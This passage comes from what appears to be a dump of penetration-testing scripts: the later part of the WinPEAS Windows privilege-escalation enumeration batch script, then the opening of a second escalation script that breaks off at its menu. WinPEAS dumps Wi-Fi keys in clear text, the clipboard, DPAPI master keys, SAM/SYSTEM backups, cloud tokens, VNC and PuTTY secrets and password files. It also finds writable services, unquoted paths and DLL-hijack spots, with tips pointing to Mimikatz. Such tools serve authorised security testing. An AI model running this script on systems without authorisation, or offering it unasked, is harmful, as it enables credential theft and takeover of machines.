| ECHO. [i] You need System-rights to extract them 171 | reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT 2>nul 172 | CALL :T_Progress 1 173 | 174 | :UACSettings 175 | CALL :ColorLine " %E%33m[+]%E%97m UAC Settings" 176 | ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on 177 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access 178 | REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul 179 | ECHO. 180 | CALL :T_Progress 1 181 | 182 | :AVSettings 183 | CALL :ColorLine " %E%33m[+]%E%97m Registered Anti-Virus(AV)" 184 | WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more 185 | ECHO.Checking for defender whitelisted PATHS 186 | reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 2>nul 187 | CALL :T_Progress 1 188 | 189 | :PSSettings 190 | CALL :ColorLine " %E%33m[+]%E%97m PowerShell settings" 191 | ECHO.PowerShell v2 Version: 192 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine /v PowerShellVersion 2>nul 193 | ECHO.PowerShell v5 Version: 194 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine /v PowerShellVersion 2>nul 195 | ECHO.Transcriptions Settings: 196 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription 2>nul 197 | ECHO.Module logging settings: 198 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging 2>nul 199 | ECHO.Scriptblog logging settings: 200 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 2>nul 201 | ECHO. 202 | ECHO.PS default transcript history 203 | dir %SystemDrive%\transcripts\ 2>nul 204 | ECHO. 205 | ECHO.Checking PS history file 206 | dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 2>nul 207 | ECHO. 208 | CALL :T_Progress 3 209 | 210 | :MountedDisks 211 | CALL :ColorLine " %E%33m[+]%E%97m MOUNTED DISKS" 212 | ECHO. [i] Maybe you find something interesting 213 | (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) 214 | ECHO. 215 | CALL :T_Progress 1 216 | 217 | :Environment 218 | CALL :ColorLine " %E%33m[+]%E%97m ENVIRONMENT" 219 | ECHO. [i] Interesting information? 220 | ECHO. 221 | set 222 | ECHO. 223 | CALL :T_Progress 1 224 | 225 | :InstalledSoftware 226 | CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE" 227 | ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed 228 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software 229 | ECHO. 230 | dir /b "C:\Program Files" "C:\Program Files (x86)" | sort 231 | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" 232 | reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\" 233 | IF exist C:\Windows\CCM\SCClient.exe ECHO.SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading) 234 | ECHO. 235 | CALL :T_Progress 2 236 | 237 | :RemodeDeskCredMgr 238 | CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager" 239 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager 240 | IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files 241 | ECHO. 242 | CALL :T_Progress 1 243 | 244 | :WSUS 245 | CALL :ColorLine " %E%33m[+]%E%97m WSUS" 246 | ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) 247 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus 248 | reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" 249 | ECHO. 250 | CALL :T_Progress 1 251 | 252 | :RunningProcesses 253 | CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES" 254 | ECHO. [i] Something unexpected is running? Check for vulnerabilities 255 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes 256 | tasklist /SVC 257 | ECHO. 258 | CALL :T_Progress 2 259 | ECHO. [i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in) 260 | for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( 261 | for /f eol^=^"^ delims^=^" %%z in ('ECHO.%%x') do ( 262 | icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. 263 | ) 264 | ) 265 | ECHO. 266 | ECHO. [i] Checking directory permissions of running processes (DLL injection) 267 | for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('ECHO.%%x') do ( 268 | icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. 269 | ) 270 | ECHO. 271 | CALL :T_Progress 3 272 | 273 | :RunAtStartup 274 | CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP" 275 | ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary 276 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup 277 | ::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ 278 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ 279 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ 280 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ 281 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ 282 | CALL :T_Progress 2 283 | icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ 284 | icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ 285 | icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ 286 | icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ 287 | CALL :T_Progress 2 288 | icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ 289 | icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ 290 | icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ 291 | icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ 292 | CALL :T_Progress 2 293 | schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab informa") 294 | ECHO. 295 | CALL :T_Progress 2 296 | 297 | :AlwaysInstallElevated 298 | CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?" 299 | ECHO. [i] If '1' then you can install a .msi file with admin privileges ;) 300 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated 301 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul 302 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul 303 | ECHO. 304 | CALL :T_Progress 2 305 | 306 | :NetworkShares 307 | CALL :ColorLine "%E%32m[*]%E%97m NETWORK" 308 | CALL :ColorLine " %E%33m[+]%E%97m CURRENT SHARES" 309 | net share 310 | ECHO. 311 | CALL :T_Progress 1 312 | 313 | :NetworkInterfaces 314 | CALL :ColorLine " %E%33m[+]%E%97m INTERFACES" 315 | ipconfig /all 316 | ECHO. 317 | CALL :T_Progress 1 318 | 319 | :NetworkUsedPorts 320 | CALL :ColorLine " %E%33m[+]%E%97m USED PORTS" 321 | ECHO. [i] Check for services restricted from the outside 322 | netstat -ano | findstr /i listen 323 | ECHO. 324 | CALL :T_Progress 1 325 | 326 | :NetworkFirewall 327 | CALL :ColorLine " %E%33m[+]%E%97m FIREWALL" 328 | netsh firewall show state 329 | netsh firewall show config 330 | ECHO. 331 | CALL :T_Progress 2 332 | 333 | :ARP 334 | CALL :ColorLine " %E%33m[+]%E%97m ARP" 335 | arp -A 336 | ECHO. 337 | CALL :T_Progress 1 338 | 339 | :NetworkRoutes 340 | CALL :ColorLine " %E%33m[+]%E%97m ROUTES" 341 | route print 342 | ECHO. 343 | CALL :T_Progress 1 344 | 345 | :WindowsHostsFile 346 | CALL :ColorLine " %E%33m[+]%E%97m Hosts file" 347 | type C:\WINDOWS\System32\drivers\etc\hosts | findstr /v "^#" 348 | CALL :T_Progress 1 349 | 350 | :DNSCache 351 | CALL :ColorLine " %E%33m[+]%E%97m DNS CACHE" 352 | ipconfig /displaydns | findstr "Record" | findstr "Name Host" 353 | ECHO. 354 | CALL :T_Progress 1 355 | 356 | :WifiCreds 357 | CALL :ColorLine " %E%33m[+]%E%97m WIFI" 358 | for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) 359 | CALL :T_Progress 1 360 | 361 | :BasicUserInfo 362 | CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO 363 | ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege 364 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups 365 | ECHO. 366 | CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER" 367 | net user %username% 368 | net user %USERNAME% /domain 2>nul 369 | whoami /all 370 | ECHO. 371 | CALL :T_Progress 2 372 | 373 | :BasicUserInfoUsers 374 | CALL :ColorLine " %E%33m[+]%E%97m USERS" 375 | net user 376 | ECHO. 377 | CALL :T_Progress 1 378 | 379 | :BasicUserInfoGroups 380 | CALL :ColorLine " %E%33m[+]%E%97m GROUPS" 381 | net localgroup 382 | ECHO. 383 | CALL :T_Progress 1 384 | 385 | :BasicUserInfoAdminGroups 386 | CALL :ColorLine " %E%33m[+]%E%97m ADMINISTRATORS GROUPS" 387 | REM seems to be localised 388 | net localgroup Administrators 2>nul 389 | net localgroup Administradores 2>nul 390 | ECHO. 391 | CALL :T_Progress 1 392 | 393 | :BasicUserInfoLoggedUser 394 | CALL :ColorLine " %E%33m[+]%E%97m CURRENT LOGGED USERS" 395 | quser 396 | ECHO. 397 | CALL :T_Progress 1 398 | 399 | :KerberosTickets 400 | CALL :ColorLine " %E%33m[+]%E%97m Kerberos Tickets" 401 | klist 402 | ECHO. 403 | CALL :T_Progress 1 404 | 405 | :CurrentClipboard 406 | CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD" 407 | ECHO. [i] Any password inside the clipboard? 408 | powershell -command "Get-Clipboard" 2>nul 409 | ECHO. 410 | CALL :T_Progress 1 411 | 412 | :ServiceVulnerabilities 413 | CALL :ColorLine "%E%32m[*]%E%97m SERVICE VULNERABILITIES" 414 | :::sysinternals external tool 415 | ::ECHO. 416 | ::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR 'Authenticated users', Everyone, BUILTIN\Users, Todos and CURRENT USER" 417 | ::ECHO. [i] If Authenticated Users have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG or WRITE_DAC or WRITE_OWNER or GENERIC_WRITE or GENERIC_ALL, you can modify the binary that is going to be executed by the service and start/stop the service 418 | ::ECHO. [i] If accesschk.exe is not in PATH, nothing will be found here 419 | ::ECHO. [i] AUTHETICATED USERS 420 | ::accesschk.exe -uwcqv "Authenticated Users" * /accepteula 2>nul 421 | ::ECHO. [i] EVERYONE 422 | ::accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul 423 | ::ECHO. [i] BUILTIN\Users 424 | ::accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul 425 | ::ECHO. [i] TODOS 426 | ::accesschk.exe -uwcqv "Todos" * /accepteula 2>nul 427 | ::ECHO. [i] %USERNAME% 428 | ::accesschk.exe -uwcqv %username% * /accepteula 2>nul 429 | ::ECHO. 430 | ::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR *" 431 | ::ECHO. [i] Check for weird service permissions for unexpected groups" 432 | ::accesschk.exe -uwcqv * /accepteula 2>nul 433 | CALL :T_Progress 1 434 | ECHO. 435 | 436 | :ServiceBinaryPermissions 437 | CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS" 438 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services 439 | for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( 440 | for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO. 441 | ) 442 | ECHO. 443 | CALL :T_Progress 1 444 | 445 | :CheckRegistryModificationAbilities 446 | CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY" 447 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services 448 | for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a 449 | ECHO. 450 | CALL :T_Progress 1 451 | 452 | :UnquotedServicePaths 453 | CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" 454 | ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' 455 | ECHO. [i] The permissions are also checked and filtered using icacls 456 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services 457 | for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( 458 | for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( 459 | ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO. 460 | ) 461 | ) 462 | CALL :T_Progress 2 463 | ::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """ 464 | ECHO. 465 | ::CALL :T_Progress 1 466 | 467 | :PATHenvHijacking 468 | CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable" 469 | ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations 470 | ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate 471 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking 472 | for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. ) 473 | ECHO. 474 | CALL :T_Progress 1 475 | 476 | :WindowsCredentials 477 | CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS" 478 | ECHO. 479 | CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT" 480 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault 481 | cmdkey /list 482 | ECHO. 483 | CALL :T_Progress 2 484 | 485 | :DPAPIMasterKeys 486 | CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" 487 | ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt 488 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi 489 | powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul 490 | powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul 491 | CALL :T_Progress 2 492 | CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" 493 | ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt 494 | ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module 495 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi 496 | ECHO. 497 | ECHO.Looking inside %appdata%\Microsoft\Credentials\ 498 | ECHO. 499 | dir /b/a %appdata%\Microsoft\Credentials\ 2>nul 500 | CALL :T_Progress 2 501 | ECHO. 502 | ECHO.Looking inside %localappdata%\Microsoft\Credentials\ 503 | ECHO. 504 | dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul 505 | CALL :T_Progress 2 506 | ECHO. 507 | 508 | :UnattendedFiles 509 | CALL :ColorLine " %E%33m[+]%E%97m Unattended files" 510 | IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO.%WINDIR%\sysprep\sysprep.xml exists. 511 | IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO.%WINDIR%\sysprep\sysprep.inf exists. 512 | IF EXIST %WINDIR%\sysprep.inf ECHO.%WINDIR%\sysprep.inf exists. 513 | IF EXIST %WINDIR%\Panther\Unattended.xml ECHO.%WINDIR%\Panther\Unattended.xml exists. 514 | IF EXIST %WINDIR%\Panther\Unattend.xml ECHO.%WINDIR%\Panther\Unattend.xml exists. 515 | IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO.%WINDIR%\Panther\Unattend\Unattend.xml exists. 516 | IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO.%WINDIR%\Panther\Unattend\Unattended.xml exists. 517 | IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO.%WINDIR%\System32\Sysprep\unattend.xml exists. 518 | IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO.%WINDIR%\System32\Sysprep\unattended.xml exists. 519 | IF EXIST %WINDIR%\..\unattend.txt ECHO.%WINDIR%\..\unattend.txt exists. 520 | IF EXIST %WINDIR%\..\unattend.inf ECHO.%WINDIR%\..\unattend.inf exists. 521 | ECHO. 522 | CALL :T_Progress 2 523 | 524 | :SAMSYSBackups 525 | CALL :ColorLine " %E%33m[+]%E%97m SAM and SYSTEM backups" 526 | IF EXIST %WINDIR%\repair\SAM ECHO.%WINDIR%\repair\SAM exists. 527 | IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO.%WINDIR%\System32\config\RegBack\SAM exists. 528 | IF EXIST %WINDIR%\System32\config\SAM ECHO.%WINDIR%\System32\config\SAM exists. 529 | IF EXIST %WINDIR%\repair\SYSTEM ECHO.%WINDIR%\repair\SYSTEM exists. 530 | IF EXIST %WINDIR%\System32\config\SYSTEM ECHO.%WINDIR%\System32\config\SYSTEM exists. 531 | IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO.%WINDIR%\System32\config\RegBack\SYSTEM exists. 532 | ECHO. 533 | CALL :T_Progress 3 534 | 535 | :McAffeeSitelist 536 | CALL :ColorLine " %E%33m[+]%E%97m McAffee SiteList.xml" 537 | cd %ProgramFiles% 2>nul 538 | dir /s SiteList.xml 2>nul 539 | cd %ProgramFiles(x86)% 2>nul 540 | dir /s SiteList.xml 2>nul 541 | cd "%windir%\..\Documents and Settings" 2>nul 542 | dir /s SiteList.xml 2>nul 543 | cd %windir%\..\Users 2>nul 544 | dir /s SiteList.xml 2>nul 545 | ECHO. 546 | CALL :T_Progress 2 547 | 548 | :GPPPassword 549 | CALL :ColorLine " %E%33m[+]%E%97m GPP Password" 550 | cd "%SystemDrive%\Microsoft\Group Policy\history" 2>nul 551 | dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul 552 | cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history" 2>nul 553 | dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul 554 | ECHO. 555 | CALL :T_Progress 2 556 | 557 | :CloudCreds 558 | CALL :ColorLine " %E%33m[+]%E%97m Cloud Credentials" 559 | cd "%SystemDrive%\Users" 560 | dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul 561 | cd "%windir%\..\Documents and Settings" 562 | dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul 563 | ECHO. 564 | CALL :T_Progress 2 565 | 566 | :AppCMD 567 | CALL :ColorLine " %E%33m[+]%E%97m AppCmd" 568 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe 569 | IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. 570 | ECHO. 571 | CALL :T_Progress 2 572 | 573 | :RegFilesCredentials 574 | CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials" 575 | ECHO. [i] Searching specific files that may contains credentials. 576 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files 577 | ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password 578 | reg query HKCU\Software\ORL\WinVNC3\Password 2>nul 579 | CALL :T_Progress 2 580 | ECHO.Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password 581 | reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul 582 | CALL :T_Progress 2 583 | ECHO.Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon 584 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" 585 | CALL :T_Progress 2 586 | ECHO.Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP 587 | reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul 588 | CALL :T_Progress 2 589 | ECHO.Looking inside HKCU\Software\TightVNC\Server 590 | reg query HKCU\Software\TightVNC\Server 2>nul 591 | CALL :T_Progress 2 592 | ECHO.Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions 593 | reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 2>nul 594 | CALL :T_Progress 2 595 | ECHO.Looking inside HKCU\Software\OpenSSH\Agent\Keys 596 | CALL :T_Progress 2 597 | reg query HKCU\Software\OpenSSH\Agent\Keys /s 2>nul 598 | cd %USERPROFILE% 2>nul && dir /s/b *password* == *credential* 2>nul 599 | cd ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\.. 600 | dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll" 601 | cd inetpub 2>nul && (dir /s/b web.config == *.log & cd ..) 602 | ECHO. 603 | CALL :T_Progress 2 604 | 605 | :ExtendedDriveScan 606 | if "%long%" == "true" ( 607 | CALL :ColorLine " %E%33m[+]%E%97m REGISTRY WITH STRING pass OR pwd" 608 | reg query HKLM /f passw /t REG_SZ /s 609 | reg query HKCU /f passw /t REG_SZ /s 610 | reg query HKLM /f pwd /t REG_SZ /s 611 | reg query HKCU /f pwd /t REG_SZ /s 612 | ECHO. 613 | ECHO. [i] Iterating through the drives 614 | ECHO. 615 | for /f %%x in ('wmic logicaldisk get name^| more') do ( 616 | set tdrive=%%x 617 | if "!tdrive:~1,2!" == ":" ( 618 | %%x 619 | CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config" 620 | findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul 621 | ECHO. 622 | CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\" 623 | dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\" 624 | ECHO. 625 | ) 626 | ) 627 | CALL :T_Progress 2 628 | ) ELSE ( 629 | CALL :T_Progress 2 630 | ) 631 | TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Idle 632 | ECHO.--- 633 | ECHO.Scan complete. 634 | PAUSE >NUL 635 | EXIT /B 636 | 637 | :::-Subroutines 638 | 639 | :SetOnce 640 | REM :: ANSI escape character is set once below - for ColorLine Subroutine 641 | SET "E=0x1B[" 642 | SET "PercentageTrack=0" 643 | EXIT /B 644 | 645 | :T_Progress 646 | SET "Percentage=%~1" 647 | SET /A "PercentageTrack=PercentageTrack+Percentage" 648 | TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Scanning... !PercentageTrack!%% 649 | EXIT /B 650 | 651 | :ColorLine 652 | SET "CurrentLine=%~1" 653 | FOR /F "delims=" %%A IN ('FORFILES.EXE /P %~dp0 /M %~nx0 /C "CMD /C ECHO.!CurrentLine!"') DO ECHO.%%A 654 | EXIT /B -------------------------------------------------------------------------------- /escalate/winprivesc.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | title Windows Enumeration and Privilege Escalation Script 3 | echo. 4 | echo Loading System Information, wait a few seconds... 5 | systeminfo > systeminfo.txt 2> nul 6 | find "KB" systeminfo.txt > hotfix.txt 2> nul 7 | cls 8 | :MENU 9 | echo " _ ___ ____ _ ______ 10 | echo "| | / (_)___ / __ \_____(_) __/ ____/_________ 11 | echo "| | /| / / / __ \/ /_/ / ___/ / | / / __/ / ___/ ___/ 12 | echo "| |/ |/ / / / / / ____/ / / /| |/ / /___(__ ) /__ 13 | echo "|__/|__/_/_/ /_/_/ /_/ /_/ |___/_____/____/\___/ 14 | echo. 15 | echo Windows Enumeration and Privilege Escalation Script 16 | echo www.joshruppe.com ^| Twitter: @josh_ruppe 17 | echo. 18 | 19 | echo 1 - All to Report 20 | echo 2 - Operating System 21 | echo 3 - Storage 22 | echo 4 - 